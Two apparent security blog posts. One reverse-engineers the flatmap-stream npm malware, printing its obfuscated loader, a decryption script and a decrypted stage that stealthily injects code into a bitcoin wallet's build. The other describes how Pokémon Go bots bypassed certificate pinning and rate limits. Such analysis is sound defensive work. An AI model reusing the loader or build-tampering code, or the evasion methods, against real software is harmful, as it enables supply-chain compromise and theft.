Reverse Engineering JS by example

flatmap-stream payload A

In November, the npm package event-stream was exploited via a malicious dependency, flatmap-stream. The whole ordeal was written up here and the focus of this post is to use it as a case study for reverse engineering JavaScript. The 3 payloads associated with flatmap-stream are simple enough to be easy to write about and complex enough to be interesting. While it is not critical to understand the backstory of this incident in order to understand this post, I will be making assumptions that might not be obvious if you aren’t somewhat familiar with the details.

Reverse engineering most JavaScript is more straightforward than binary executables you may run on your desktop OS – after all, the source is right in front of you – but JavaScript code that is designed to be difficult to understand often goes through a few passes of obfuscation in order to obscure its intent. Some of this obfuscation comes from what is called “minification” which is the process of reducing the overall bytecount of your source as much as possible for space saving purposes. This involves shortening of variables to single character identifiers and translating expressions like true to something shorter but equivalent like !0. Minification is mostly unique to JavaScript’s ecosystem because of its web browser origins and is occasionally seen in node packages due to a reuse of tools and is not intended to be a security measure. For basic reversal of common minification and obfuscation techniques, check out Shape’s unminify tool. Dedicated obfuscation passes may come from tools designed to obfuscate or are performed manually by the developer

The first step is to get your hand on the isolated source for analysis. The flatmap-stream package was crafted specifically to look innocent except for a malicious payload included in only one version of the package, version 0.1.1. You can quickly see the changes to the source by diffing version 0.1.2 and version 0.1.1 or even just alternating between the urls in two tabs. For the rest of the post we’ll be referring to the appended source as payload A. Below is the formatted source of payload A.

! function() {
    try {
        var r = require,
            t = process;

        function e(r) {
            return Buffer.from(r, "hex").toString()
        }
        var n = r(e("2e2f746573742f64617461")),
            o = t[e(n[3])][e(n[4])];
        if (!o) return;
        var u = r(e(n[2]))[e(n[6])](e(n[5]), o),
            a = u.update(n[0], e(n[8]), e(n[9]));
        a += u.final(e(n[9]));
        var f = new module.constructor;
        f.paths = module.paths, f[e(n[7])](a, ""), f.exports(n[1])
    } catch (r) {}
}();

First things first: NEVER RUN MALICIOUS CODE (except in insulated environments). I’ve written my own tools to help me refactor code dynamically using the Shift suite of parsers and JavaScript transformers but you can use an IDE like Visual Studio Code for the purposes of following along with this post.

When reverse engineering JavaScript it is valuable to keep the mental juggling to a minimum. This means getting rid of any expressions or statements that don’t add immediate value and also reversing the DRYness of any code that has been optimized automatically or manually. Since we’re statically analyzing the JavaScript and tracking execution in our heads, the deeper your mental stack grows the more likely it is you’ll get lost.

One of the simplest things you can do is unminify variables that are being assigned global properties like require and process, like on lines 3 and 4.

var r = require,
    p = process;

You can do this with any IDE that offers refactoring capabilities (usually by pressing “F2” over an identifier you want to rename). After that, we see a function definition, e, which appears to simply decode a hex string.

function e(r) {
    return Buffer.from(r, "hex").toString()
}

The first interesting line of code appears to import a file which comes from the result of the function e decoding the string "2e2f746573742f64617461"

var n = require(e("2e2f746573742f64617461")),

It is extremely common for deliberately obfuscated JavaScript to obscure any literal string value so that anyone who takes a passing glance won’t get alerted by particularly ominous strings or properties in clear view. Most developers recognize this is a very low hurdle so you’ll often find trivially undoable encoding in place and that’s no different here. The e function simply reverses hex strings and you can do that manually via an online tool or with your own convenience function. Even if you’re confident that you understand that the e function is doing, it’s still a good idea to not run it (even if you extract it) with input found in a malicious file because you have no guarantees that the attacker hasn’t found a security vulnerability which is triggered by the data.

After reversing that string we see that the script is including a data file, './test/data' which is located in the distributed npm package.

module.exports = [
  "75d4c87f3[...large entry cut...]68ecaa6629",
  "db67fdbfc[...large entry cut...]349b18bc6e1",
  "63727970746f",
  "656e76",
  "6e706d5f7061636b6167655f6465736372697074696f6e",
  "616573323536",
  "6372656174654465636970686572",
  "5f636f6d70696c65",
  "686578",
  "75746638"
];

After renaming n to data and deobfuscating calls to e(n[2]) to e(n[9]) we start to see a better picture of what we’re dealing with here.

(function () {
  try {
    var data = require("./test/data");
    var o = process["env"]["npm_package_description"];
    var u = require("crypto")["createDecipher"]("aes256", o);
    var a = u.update(data[0], "hex", "utf8");
    a += u.final("utf8");
    var f = new module.constructor;
    f.paths = module.paths;
    f["_compile"](a, "");
    f.exports(data[1]);
  } catch (r) {}
}());

It’s also easy to see why these strings were hidden, finding any references to decryption in a simple flatmap library would be a dead giveaway that something is very wrong.

From here we see the script is importing node.js’s “crypto” library and, after looking up the APIs, we find that the second argument to createDecipher, o here, is the password used to decrypt. Now we can rename that argument and the following return values to sensible names based on the API. Every time we find a new piece of the puzzle it’s important to immortalize it via a refactor or a comment, even if it’s a renamed variable that seems trivial. It’s very common when diving through foreign code for hours that you lose your place, get distracted, or need to backtrack because of some erroneous refactor. Using git to save checkpoints during a refactor is valuable as well but I’ll leave that decision to you. The code now looks as follows, with the e function deleted because it is no longer used along with the statement if (!o) {... because it doesn’t add value to the analysis.

(function () {
  try {
    var data = require("./test/data");
    var password = process["env"]["npm_package_description"];
    var decipher = require("crypto")["createDecipher"]("aes256", password);
    var decrypted = decipher.update(data[0], "hex", "utf8");
    decrypted += decipher.final("utf8");
    var newModuleInstance = new module.constructor;
    newModuleInstance.paths = module.paths;
    newModuleInstance["_compile"](decrypted, "");
    newModuleInstance.exports(data[1]);
  } catch (r) {}
}());

You’ll also notice I’ve renamed f to newModuleInstance. With code this short it’s not critical but with code that might be hundreds of lines long it’s important for everything to be as clear as possible.

Now payload A is largely deobfuscated and we can walk through it to understand what it does.

Line 3 imports our external data.

var data = require("./test/data");

Line 4 grabs a password out of the environment. process.env allows you to access variables from within a node script and npm_package_description is a variables that npm, node’s package manager, sets when you run scripts defined in a package.json file.

var password = process["env"]["npm_package_description"];

Line 5 creates a decipher instance with the value from npm_package_description as the password. This means that the encrypted payload can only be decrypted when this script is executed via npm and is being executed for a particular project that has, in its package.json, a specific description field. That’s going to be tough.

var decipher = require("crypto")["createDecipher"]("aes256", password);

Lines 6 and 7 decrypt the first element in our external file and store it in the variable “decrypted

var decrypted = decipher.update(data[0], "hex", "utf8");
decrypted += decipher.final("utf8");

Lines 8-11 create a new module and then feeds the decrypted data into the undocumented method _compile. This module then exports the second element of our external data file. module.exports is node’s mechanism of exposing data from one module to another, so newModuleInstance.exports(data[1]) is exposing a second encrypted payload found in our external data file.

var newModuleInstance = new module.constructor;
newModuleInstance.paths = module.paths;
newModuleInstance["_compile"](decrypted, "");
newModuleInstance.exports(data[1]);

At this point we have encrypted data that is only decryptable with a password found in a package.json somewhere and whose decrypted data gets fed into the _compile method. Now we are left with a problem: how do you decrypt data where the password is unknown? This is a non-trivial question, if it were easy to brute force aes256 encryption then we’d have more problems than an npm package being taken over. Luckily we’re not dealing with a completely unknown set of possible passwords, just any string that happened to be entered into a package.json somewhere. package.json files originated as the file format for npm package metadata so we may as well start at the official npm registry. Luckily there’s an npm package that gives us a stream of all package metadata.

There’s no guarantee our target file is located in an npm package, many non-npm projects use package.json to store configuration for node-based tools, and package.json descriptions can change from version to version but it’s a good place to start. It is possible to decrypt this payload with multiple keys resulting in garbled gibberish so we need some way of validating our decrypted payload during this brute forcing process. Since we’re dealing something that is fed to Module.prototype._compile which feeds to vm.runInThisContext we can reasonably assume that the output is JavaScript and we can use any number of JavaScript parsers to validate the data. If our password fails or if it succeeds but our parser throws an error then we need to move to the next package.json. Conveniently, Shape Security has built its own set of JavaScript parsers for use in JavaScript and Java environments. The brute force script used is here:

const crypto = require('crypto');
const registry = require('all-the-packages')
const data = require('./test-data');
const { parseScript } = require('shift-parser');

let num = 0;
const start = Date.now();
registry
  .on('package', function (pkg) {
    num++;
    const password = pkg.description;
    const decrypted = decrypt(data[0], password);
    if (decrypted && parse(decrypted)) {
      console.log(`Password is '${password}' from ${pkg.name}@${pkg.version}`);
    }
  })
  .on('end', function () {
    const end = Date.now();
    console.log(`Done. Processed ${num} package's metadata in ${(end - start) / 1000} seconds.`);
  })

function decrypt(data, password) {
  try {
    const decipher = crypto.createDecipher("aes256", password);
    let decrypted = decipher.update(data, "hex", "utf8");
    decrypted += decipher.final("utf8");
    return decrypted;
  } catch (e) {
    return false;
  }
}

function parse(input) {
  try { 
    parseScript(input);
    return true;
  } catch(e) {
    return false;
  }
}

After running this for 92.1 seconds and processing 740543 packages we come up with our password – “A Secure Bitcoin Wallet” – which successfully decodes the payload included below:

/*@@*/
module.exports = function(e) {
    try {
        if (!/build\:.*\-release/.test(process.argv[2])) return;
        var t = process.env.npm_package_description,
            r = require("fs"),
            i = "./node_modules/@zxing/library/esm5/core/common/reedsolomon/ReedSolomonDecoder.js",
            n = r.statSync(i),
            c = r.readFileSync(i, "utf8"),
            o = require("crypto").createDecipher("aes256", t),
            s = o.update(e, "hex", "utf8");
        s = "\n" + (s += o.final("utf8"));
        var a = c.indexOf("\n/*@@*/");
        0 <= a && (c = c.substr(0, a)), r.writeFileSync(i, c + s, "utf8"), r.utimesSync(i, n.atime, n.mtime), process.on("exit", function() {
            try {
                r.writeFileSync(i, c, "utf8"), r.utimesSync(i, n.atime, n.mtime)
            } catch (e) {}
        })
    } catch (e) {}
};

This was lucky. What could have been a monstrous brute forcing problem ended up needing less than a million iterations. The affected package with the key in question ended up being the bitcoin wallet Copay’s client application. The next two payloads dive deeper into the application itself and, given the target application is centered around storing bitcoins, you can probably guess where this might be going.

If you find topics like this interesting and want to read an analysis for the other two payloads or future attacks, then be sure to “like” this post or let me know on twitter at @jsoverson.

Pokémon Go API – A Closer Look at Automated Attacks

Tens of millions of people are out exploring the new world of Pokémon Go. It turns out that many of those users are not people at all, but automated agents, or bots. Game-playing bots are not a new phenomenon, but Pokémon Go offers some new use cases for bots. These bots have started interfering with everyone’s fun by overwhelming Pokémon Go servers with automated traffic. Pokémon Go is a perfect case study in how automated attacks and defenses work on mobile APIs. At Shape we deal with these types of attacks every day, so we thought we would take a closer look at what happened with the Pokémon Go API attacks.

Pokémon Go API Attack

Niantic recently published a blog post detailing the problems bots were creating through the generation of automated traffic, which actually hindered their Latin America launch. The chart included in the post depicts a significant spatial query traffic drop since Niantic rolled out countermeasures for the automation at 1pm PT 08/03. The automated traffic appears to have been about twice that of the traffic from real human players. No wonder Pokémon Go servers were heavily overloaded in recent weeks.

server_resourcesFigure 1. Spatial query traffic dropped more than 50% since Niantic started to block scrapers. Source: Niantic blog post

Getting to Know The Pokémon Bots

There are two types of Pokémon bots. The first type of bot automates regular gameplay and is a common offender on other gaming apps, automating activities such as walking around and catching Pokémon. Examples of such bots include MyGoBot and PokemonGo-Bot. But Pokémon Go has inspired the development of a new type of bot, called a Tracker or Mapper, which provides the location of Pokémon. These bots power Pokémon Go mapping services such as Pokevision and Go Radar.

How a Pokémon Go Bot Works

A mobile API bot is a program that mimics communication between a mobile app and its backend servers—in this case servers from Niantic. The bot simply tells the servers what actions are taken and consumes the server’s response.

Figure 2 shows a screenshot of a Pokémon Go map which marks nearby Pokémon within a 3-footstep range of a given location. To achieve this, the bot makers usually follow these steps:

  1. Reverse-engineer the communication protocol between the mobile app and the backend server. The bot maker plays the game, captures the communications between the app and its server, and deciphers the protocol format.
  2. Write a program to make series of “legitimate” requests to backend servers to take actions. In this case, getting locations of nearby Pokémon is a single request with a targeted GPS coordinate, without the real walk to the physical location. The challenge to the bot is to bypass a server’s detection and look like a real human.
  3. Provide related features such as integration with Google Maps, or include the bot’s own mapping functionality for the user.

pokemon-map.pngFigure 2. Screenshot of a Pokémon Go map

Mobile App Cracks and Defenses

Using Pokémon Go app as an example, let’s examine how a mobile app is cracked by reverse engineering to reveal its secrets. Since attackers mainly exploited Pokémon Go’s Android app, let’s focus on Android app cracks and defenses.

Reverse-Engineering the Protocol

The Pokémon Go app and the backend servers communicate using ProtoBuf over SSL. ProtoBuf defines the data format transferred on the network. For example, here is an excerpt of the ProtoBuf definition for player stats:

message PlayerStats {
  int32 level = 1;
  int64 experience = 2;
  int64 prev_level_xp = 3;
  int64 next_level_xp = 4;
  float km_walked = 5;
  int32 pokemons_encountered = 6;
  int32 unique_pokedex_entries = 7;
  ……
}

Pokémon Go was reverse-engineered and published online by POGOProtos within only two weeks. How did this happen so quickly? Initially, Niantic didn’t use certificate pinning.

Certificate pinning is a common approach used against Man-in-the-Middle attacks. In short, a mobile app only trusts server certificates which are embedded in the app itself. Without certificate pinning protection, an attacker can easily set up a proxy such as Mitmproxy or Fiddler, and install the certificate crafted by the attacker to her phone. Next she can configure her phone to route traffic through the proxy and sniff the traffic between the Pokémon Go app and the Niantic servers. There is actually a Pokémon Go-specific proxy tool that facilitates this called pokemon-go-mitm.

On July 31, Niantic made a big change on both its server and its Pokémon Go app. Pokémon Go 0.31.0 was released with certificate pinning protection. Unfortunately, the cat was out of the bag and the communication protocol was already publicly available on GitHub. In addition, implementing certificate pinning correctly is not always easy. In the later sections, we will cover some techniques commonly used by attackers to bypass certificate pinning.

APK Static Analysis

The Android application package (APK) is the package file format used by Android to install mobile apps. Android apps are primarily written in Java, and the Java code is compiled into dex format and built into an apk file. In addition, Android apps may also call shared libraries which are written in native code (Android NDK).

Dex files are known to be easily disassembled into SMALI languages, using tools such as Baksmali. Then tools such as dex2jar and jd-gui further decompile the dex file into Java code, which is easy to read. Using these techniques, attackers decompiled the Pokémon Go Android app (version 0.29.0 and 0.31.0) into Java code. The example code shown below implements certificate pinning from the com.nianticlabs.nia.network.NianticTrustManager class.

public void checkServerTrusted(X509Certificate[] chain, String authType) throws CertificateException {
  synchronized (this.callbackLock) {
    nativeCheckServerTrusted(chain, authType);
  }
}

When application source code is exposed, reverse engineering becomes a no-brainer. Pokemon Go Xposed used less than 100 lines of Java code to fool the Pokémon Go app into believing the certificate from the MITMProxy was the authentic certificate from Niantic.

How did Pokemon Go Xposed achieve this? Quite easily. The tool simply hooks to the call of the function checkServerTrusted mentioned in the above code snippet. The hook changes the first parameter of the function, chain, to the value of Niantic’s certificate. This means that no matter what unauthorized certificate the proxy uses, the Pokémon Go app is tricked into trusting the certificate.

There are many tools that can help make disassembly and static analysis by attackers more difficult. ProGuard and DexGuard are tools that apply obfuscation to Java code and dex files. Obfuscation makes the code difficult to read, even in decompiled form. Another approach is to use Android packers to encrypt the original classes.dex file of Android apps. The encrypted dex file is decrypted in memory at runtime, making static analysis extremely hard, if not impossible, for most attackers. Using a native library is another way to significantly increase the difficulty to reverse-engineer the app.

Reverse-Engineering the Native Library

The most interesting cat-and-mouse game between the pokemongodev hackers and Niantic was around the field named “Unknown6”, which was contained in the signature sent in the map request to get nearby Pokémon at a location. “Unknown6” is one of the unidentified fields in the reverse-engineered protobuf. Initially, it wouldn’t matter what value Unknown6 was given; Niantic servers just accepted it. Starting at 1pm PT on 08/03, all Pokémon Go bots suddenly could not find any Pokémon, which eventually resulted in the significant query drop in Figure 1.

The hackers then noticed the importance of the “Unknown6” field in the protocol, and initially suspected Unknown6 to be some kind of digest or HMAC to validate the integrity of the request. This triggered tremendous interest from the pokemongodev community and an “Unknown6” team was quickly formed to attempt to crack the mysterious field. The Discord channel went private due to the wide interest from coders and non-programmers, but a live update channel kept everybody updated on the progress of the cracking effort. After 3 days and 5 hours, in the afternoon of 08/06, the Unknown6 team claimed victory, releasing an updated Pokémon Go API that was once again able to retrieve nearby Pokémon.

While the technical writeup of the hack details has yet to be released, many relevant tools and technologies were mentioned on the forums and the live update. IDA-Pro from Hex-Rays is a professional tool that is able to disassemble the ARM code of a native library, and the new Hex-Rays decompiler can decompile a binary code file into a C-style format. These tools allow attackers to perform dynamic analysis, debugging the mobile app and its libraries at run time. Of course, even with such powerful tools, reverse-engineering a binary program is still extremely challenging. Without any intentional obfuscation, the disassembled or decompiled code is already hard to understand, and the code size is often huge. As an illustration of the complex and unpredictable work required, the live update channel and a subsequent interview described how the encryption function of “Unknown6” was identified within hours but the team spent an extensive amount of additional time analyzing another field named “Unknown22”, which turned out to be unrelated to Unknown6.

As a result, obfuscation still has many practical benefits for protecting native libraries. A high level of obfuscation in a binary may increase the difficulty of reverse-engineering by orders of magnitude. However, as illustrated by the many successful cracks of serial codes for Windows and Windows applications, motivated mobile crackers are often successful.

Server Side Protection

Server-side defenses work in a completely different way than client-side defenses. Here are some of the techniques used in the context of protecting Pokémon Go’s mobile API.

Rate limiting

Rate limiting is a common approach to try to stop, or at least slow down, automated traffic. In the early days, Pokémon scanners were able to send tens of requests per second, scan tens of cells, and find every Pokémon.

On 07/31, Niantic added rate limiting protections. If one account sent multiple map requests within ~5 seconds, Niantic’s servers would only accept the first request and drop the rest. Attackers reacted to these rate limits by: a) Adding a delay (5 seconds) between map requests from their scanning programs b) Using multiple accounts and multiple threads to bypass the rate limit

In the case of Pokémon Go, the use of rate-limiting just opened another battleground for automated attacks: automated account creation. They quickly discovered that while rate limiting is a fine basic technique to control automation from overly aggressive scrapers or novice attackers, it does not prevent advanced adversaries from getting automated requests through.

IP Blocking

Blocking IPs is a traditional technique used by standard network firewalls or Web Application Firewalls (WAFs) to drop requests from suspicious IPs. There are many databases that track IP reputation and firewalls and WAFs can retrieve such intelligence periodically.

In general, IP-based blocking is risky and ineffective. Blindly blocking an IP with a large volume of traffic may end up blocking the NAT of a university or corporation. Meanwhile, many Pokémon bots or scanners may use residential dynamic IP addresses. These IPs are shared by the customers of the ISPs, so banning an IP for a long time may block legitimate players.

Hosting services such as Amazon Web Services (AWS) and Digital Ocean are also sources for attackers to get virtual machines as well as fresh IPs. When attackers use stolen credit cards, they can even obtain these resources for free. However, legitimate users will never use hosting services to browse the web or play games, so blocking IPs from hosting services is a safe defense and is commonly used on server side. Niantic may decide to ban IPs from AWS according to this forum post.

Behavior Analysis

Behavior analysis is usually the last line of defense against advanced attackers that are able to bypass other defenses. Bots have very different behaviors compared to humans. For example, a real person cannot play the game 24×7, or catch 5 Pokémon in one second. While behavioral analysis sounds a promising approach, building an accurate detection system to handle the huge data volume like Pokémon Go isn’t an easy task.

Niantic just implemented a soft ban on cheaters who use GPS spoofing to “teleport” (i.e., suddenly moving at an impossibly fast speed). It was probably a “soft ban” because of false positives; families share accounts and GPS readings can be inaccurate, making some legitimate use cases seem like bots.

On around Aug 12 2016, Niantic posted a note on its website, and outlined that violation of its terms of service may result in a permanent ban on a Pokémon Go account. Multiple ban rules targeting bots were also disclosed unofficially. For example, the Pokemon over-catch rule bans accounts when they catch over a thousand Pokemon in a single day. In addition Niantic encourages legitimate players to report cheaters or inappropriate players.

In our experience, behavioral modeling-based detection can be extremely effective but is often technically or economically infeasible to build in-house. As Niantic commented in their blog post, “dealing with this issue also has opportunity cost. Developers have to spend time controlling this problem vs. building new features.” The bigger issue is that building technology to defend against dedicated, technically-savvy adversaries armed with botnets and other tools designed to bypass regular defenses, requires many highly specialized skillsets and a tremendous development effort.

The Game Isn’t Over

As Pokémon Go continues to be loved by players, the game between bot makers and Niantic will also continue. Defending against automated traffic represents a challenge not only for gaming but for all industries. Similar attack and defense activities are taking place across banking, airline, and retailer apps where the stakes are orders of magnitude higher than losing a few Snorlaxes. Bots and related attack tools aren’t fun and games for companies when their customers and users cannot access services because of unwanted automated traffic.